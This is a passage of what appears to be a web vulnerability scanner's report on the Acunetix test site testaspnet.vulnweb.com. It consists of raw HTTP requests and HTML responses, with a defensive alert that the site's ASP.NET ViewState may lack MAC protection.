solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Solution Ensure the MAC is set for all pages on this website.
POST http://testaspnet.vulnweb.com/login.aspx
Alert tags Alert description *** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request Request line and header section (397 bytes)
POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1197 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (1197 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8xY%2BHkfERpF5ijDSZsRL1CxlmHEA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=LoginResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:19 GMT Content-Length: 13281Response body (13281 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Solution Ensure the MAC is set for all pages on this website.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
Alert tags Alert description *** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request Request line and header section (455 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Content-Length: 6567 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (6567 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2